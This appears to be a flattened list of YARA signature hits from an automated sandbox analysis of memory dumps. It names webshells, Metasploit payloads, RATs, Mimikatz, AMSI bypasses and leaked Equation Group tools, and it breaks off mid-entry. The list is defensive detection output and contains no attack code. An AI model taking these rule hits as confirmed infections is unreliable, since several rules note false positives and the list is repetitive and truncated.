PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 00000013.00000003.461202031.0000000006E05000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 00000013.00000003.433232225.00000000052E4000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 00000013.00000003.413817784.00000000052A4000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 00000013.00000003.460017323.0000000006DFE000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000013.00000003.481677976.0000000006BA6000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 00000013.00000003.456923467.0000000006DC6000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_h6ss, Description: Web Shell - file h6ss.php, Source: 00000013.00000003.454771924.0000000006D6F000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, Author: unknown Rule: Fierce2, Description: This signature detects the Fierce2 domain scanner, Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx, Description: Web Shell - from files Shell [ci, Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, Author: unknown Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 00000013.00000003.423368197.00000000051EC000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 00000013.00000003.458084749.0000000006D9C000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0015, Description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, Source: 00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Webshell_27_9_acid_c99_locus7s, Description: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, Source: 00000013.00000003.438854953.0000000006BFE000.00000004.00000001.sdmp, Author: Florian Roth Rule: multiple_webshells_0015, Description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, Source: 00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Webshell_27_9_acid_c99_locus7s, Description: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, Source: 00000013.00000003.443343261.0000000006BFE000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp, Author: unknown Rule: scanarator, Description: Auto-generated rule on file scanarator.exe, Source: 00000013.00000002.524614024.000000000242B000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: webshell_PHP_b37, Description: Web Shell - file b37.php, Source: 00000013.00000003.470647242.0000000006B9B000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_PHP_b37, Description: Web Shell - file b37.php, Source: 00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp, Author: Florian Roth Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 00000013.00000003.428675269.0000000006B79000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0015, Description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, Source: 00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Webshell_27_9_acid_c99_locus7s, Description: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, Source: 00000013.00000003.485624536.0000000006BFE000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp, Author: unknown Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp, Author: Florian Roth Rule: PortRacer, Description: Auto-generated rule on file PortRacer.exe, Source: 00000013.00000003.458213135.0000000006DE1000.00000004.00000001.sdmp, Author: yarGen Yara Rule Generator by Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, Author: unknown Rule: Fierce2, Description: This signature detects the Fierce2 domain scanner, Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx, Description: Web Shell - from files Shell [ci, Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, Author: unknown Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 00000013.00000003.422640827.00000000051E4000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: multiple_webshells_0015, Description: Semi-Auto-generated - from files wacking.php.php.txt, 1.txt, SpecialShell_99.php.php.txt, c100.php.txt, Source: 00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Webshell_27_9_acid_c99_locus7s, Description: Detects Webshell - rule generated from from files 27.9.txt, acid.php, c99_locus7s.txt, Source: 00000013.00000003.441709320.0000000006BFE000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.481501193.0000000006DCE000.00000004.00000001.sdmp, Author: unknown Rule: webshell_PHP_b37, Description: Web Shell - file b37.php, Source: 00000013.00000003.473662008.0000000006B9B000.00000004.00000001.sdmp, Author: Florian Roth Rule: shankar_php_php, Description: Semi-Auto-generated - file shankar.php.php.txt, Source: 00000013.00000003.481442342.0000000006D9C000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: SQLMap, Description: This signature detects the SQLMap SQL injection tool, Source: 00000013.00000003.463235186.0000000006E38000.00000004.00000001.sdmp, Author: Florian Roth Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000013.00000003.470663077.0000000006BA5000.00000004.00000001.sdmp, Author: Florian Roth Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, Author: unknown Rule: Fierce2, Description: This signature detects the Fierce2 domain scanner, Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_Shell_ci_Biz_was_here_c100_v_xxx, Description: Web Shell - from files Shell [ci, Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, Author: unknown Rule: Safe0ver_Shell__Safe_Mod_Bypass_By_Evilc0der_php, Description: Semi-Auto-generated - file Safe0ver Shell -Safe Mod Bypass By Evilc0der.php.txt, Source: 00000013.00000003.477379778.00000000051F3000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000013.00000002.541755283.0000000002FA0000.00000004.00000040.sdmp, Author: unknown Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_h6ss, Description: Web Shell - file h6ss.php, Source: 00000013.00000003.455300807.0000000006D6F000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 00000013.00000003.477128932.00000000052EB000.00000004.00000001.sdmp, Author: Florian Roth Rule: Volgmer_Malware, Description: Detects Volgmer malware as reported in US CERT TA17-318B, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: ProcessInjector_Gen, Description: Detects a process injection utility that can be used ofr good and bad purposes, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazagne_PW_Dumper, Description: Detects Lazagne PW Dumper, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Markus Neis / Florian Roth Rule: SUSP_shellpop_Bash, Description: Detects susupicious bash command, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Tobias Michalski Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_dropper_script_Dec17_1, Description: Detects a supicious VBS script that drops an executable, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Lazarus_Dec_17_5, Description: Detects Lazarus malware from incident in Dec 2017, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_Turla_Agent_BTZ_Gen_1, Description: Detects Turla Agent.BTZ, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_BAT_Strings, Description: Detects a string also used in Netwire RAT auxilliary, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Turla_Mal_Script_Jan18_1, Description: Detects Turla malicious script, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_Obfuscated_Mal_Feb18_1, Description: Detects malicious obfuscated VBS observed in February 2018, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: LokiBot_Dropper_ScanCopyPDF_Feb18, Description: Auto-generated rule - file Scan Copy.pdf.com, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_msfconsole, Description: Detects Armitage component, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Armitage_OSX, Description: Detects Armitage component, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Silence_malware_2, Description: Detects malware sample mentioned in the Silence report on Securelist, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_Mimikatz, Description: Detects Invoke-Mimikatz String, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_unspecified_Jan18_1, Description: Detects unspecified malware sample, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_PSImage, Description: Detects a command to execute PowerShell from String, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Florian Roth Rule: malware_apt15_royaldll, Description: DLL implant, originally rights.dll and runs as a service, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: David Cannings Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MiniRAT, Description: Yara detected Mini RAT, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_ComRAT_XORKey, Description: Yara detected Turla ComRAT XORKey, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: Joe Security Rule: netwire, Description: detect netwire in memory, Source: 00000013.00000003.416659119.0000000005137000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: Liz0ziM_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_php, Description: Semi-Auto-generated - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt, Source: 00000013.00000003.470556930.0000000006B92000.00000004.00000001.sdmp, Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls Rule: Msfpayloads_msf, Description: Metasploit Payloads - file msf.sh, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_2, Description: Metasploit Payloads - file msf.asp, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_psh, Description: Metasploit Payloads - file msf-psh.vba, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_exe, Description: Metasploit Payloads - file msf-exe.vba, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_3, Description: Metasploit Payloads - file msf.psh, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_4, Description: Metasploit Payloads - file msf.aspx, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_exe_2, Description: Metasploit Payloads - file msf-exe.aspx, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_6, Description: Metasploit Payloads - file msf.vbs, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_7, Description: Metasploit Payloads - file msf.vba, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_8, Description: Metasploit Payloads - file msf.ps1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_cmd, Description: Metasploit Payloads - file msf-cmd.ps1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_11, Description: Metasploit Payloads - file msf.hta, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Msfpayloads_msf_ref, Description: Metasploit Payloads - file msf-ref.ps1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: HKTL_Meterpreter_inMemory, Description: Detects Meterpreter in-memory, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: netbiosX, Florian Roth Rule: CVE_2017_8759_SOAP_Excel, Description: Detects malicious files related to CVE-2017-8759, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_ISESteroids_Obfuscation, Description: Detects PowerShell ISESteroids obfuscation, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_1, Description: Detects Reflective DLL Loader, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_2, Description: Detects Reflective DLL Loader - suspicious - Possible FP could be program crack, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Reflective_DLL_Loader_Aug17_3, Description: Detects Reflective DLL Loader, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBScript_Favicon_File, Description: VBScript cloaked as Favicon file used in Leviathan incident, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Backdoor_Redosdru_Jun17, Description: Detects malware Redosdru - file systemHome.exe, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Backdoor_Nitol_Jun17, Description: Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: HTA_with_WScript_Shell, Description: Detects WScript Shell in HTA, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: HTA_Embedded, Description: Detects an embedded HTA file, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: StoneDrill, Description: Detects malware from StoneDrill threat report, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: StoneDrill_VBS_1, Description: Detects malware from StoneDrill threat report, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EternalRocks_taskhost, Description: Detects EternalRocks Malware - file taskhost.exe, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: BeyondExec_RemoteAccess_Tool, Description: Detects BeyondExec Remote Access Tool - file rexesvr.exe, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Disclosed_0day_POCs_injector, Description: Detects POC code from disclosed 0day hacktool set, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: APT_PupyRAT_PY, Description: Detects Pupy RAT, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: OilRig_Strings_Oct17, Description: Detects strings from OilRig malware and malicious scripts, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_Script_Running_from_HTTP, Description: Detects a suspicious , Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_dropper_script_Dec17_1, Description: Detects a supicious VBS script that drops an executable, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Malware_1, Description: Detects Industroyer related malware, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Portscan_3_Output, Description: Detects Industroyer related custom port scaner output file, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Malware_4, Description: Detects Industroyer related malware, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Industroyer_Malware_5, Description: Detects Industroyer related malware, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: redSails_PY, Description: Detects Red Sails Hacktool - Python, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Rehashed_RAT_2, Description: Detects malware from Rehashed RAT incident, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Malware_QA_vqgk, Description: VT Research QA uploaded malware - file vqgk.dll, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Microcin_Sample_5, Description: Malware sample mentioned in Microcin technical report by Kaspersky, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: clearlog, Description: Detects Fireball malware - file clearlog.dll, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: PS_AMSI_Bypass, Description: Detects PowerShell AMSI Bypass, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: JS_Suspicious_Obfuscation_Dropbox, Description: Detects PowerShell AMSI Bypass, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: JS_Suspicious_MSHTA_Bypass, Description: Detects MSHTA Bypass, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: JavaScript_Run_Suspicious, Description: Detects a suspicious Javascript Run command, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBroker_Auct_Dez16_Strings, Description: String from the ShodowBroker Files Screenshots - Dec 2016, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload_Spring1, Description: Ysoserial Payloads - file Spring1.bin, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload, Description: Ysoserial Payloads, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Ysoserial_Payload_3, Description: Ysoserial Payloads - from files JavassistWeld1.bin, JBossInterceptors.bin, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: CACTUSTORCH, Description: Detects CactusTorch Hacktool, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_1, Description: Detects Quasar RAT, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Quasar_RAT_2, Description: Detects Quasar RAT, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_Malware_2, Description: Detects malware from Operation Cloud Hopper, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_Malware_3, Description: Detects malware from Operation Cloud Hopper, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_Malware_5, Description: Detects malware from Operation Cloud Hopper, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: OpCloudHopper_WmiDLL_inMemory, Description: Malware related to Operation Cloud Hopper - Page 25, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: VBS_WMIExec_Tool_Apr17_1, Description: Tools related to Operation Cloud Hopper, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: RevengeRAT_Sep17, Description: Detects RevengeRAT malware, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimipenguin_SH, Description: Detects Mimipenguin Password Extractor - Linux, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: POSHSPY_Malware, Description: Detects, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_Mimikatz, Description: Detects Invoke-Mimikatz String, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: FIN7_Backdoor_Aug17, Description: Detects Word Dropper from Proofpoint FIN7 Report, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_SMBExec, Description: Detects Invoke-WmiExec or Invoke-SmbExec, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_WMIExec_Gen_1, Description: Detects Invoke-WmiExec or Invoke-SmbExec, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_SMBExec_Invoke_WMIExec_1, Description: Auto-generated rule - from files Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_WMIExec_Gen, Description: Auto-generated rule - from files Invoke-SMBClient.ps1, Invoke-SMBExec.ps1, Invoke-WMIExec.ps1, Invoke-WMIExec.ps1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: WMImplant, Description: Auto-generated rule - file WMImplant.ps1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: FVEY_ShadowBrokers_Jan17_Screen_Strings, Description: Detects strings derived from the ShadowBroker\'s leak of Windows tools/exploits, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Invoke_OSiRis, Description: Osiris Device Guard Bypass - file Invoke-OSiRis.ps1, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: MAL_KHRAT_script, Description: Rule derived from KHRAT script but can match on other malicious scripts as well, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_powershell, Description: Detects powershell script used in Operation Wilted Tulip, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_Windows_UM_Task, Description: Detects a Windows scheduled task as used in Operation Wilted Tulip, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_WindowsTask, Description: Detects hack tool used in Operation Wilted Tulip - Windows Tasks, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: Impacket_Tools_Generic_1, Description: Compiled Impacket Tools, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_Auditcleaner, Description: Equation Group hack tool leaked by ShadowBrokers- file Auditcleaner, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_elgingamble, Description: Equation Group hack tool leaked by ShadowBrokers- file elgingamble, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_cmsd, Description: Equation Group hack tool leaked by ShadowBrokers- file cmsd, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_ebbshave, Description: Equation Group hack tool leaked by ShadowBrokers- file ebbshave.v5, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_eggbasket, Description: Equation Group hack tool leaked by ShadowBrokers- file eggbasket, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_sambal, Description: Equation Group hack tool leaked by ShadowBrokers- file sambal, Source: 00000013.00000003.416539900.0000000005222000.00000004.00000001.sdmp, Author: Florian Roth Rule: EquationGroup_envisioncollision, Description: Equation Group 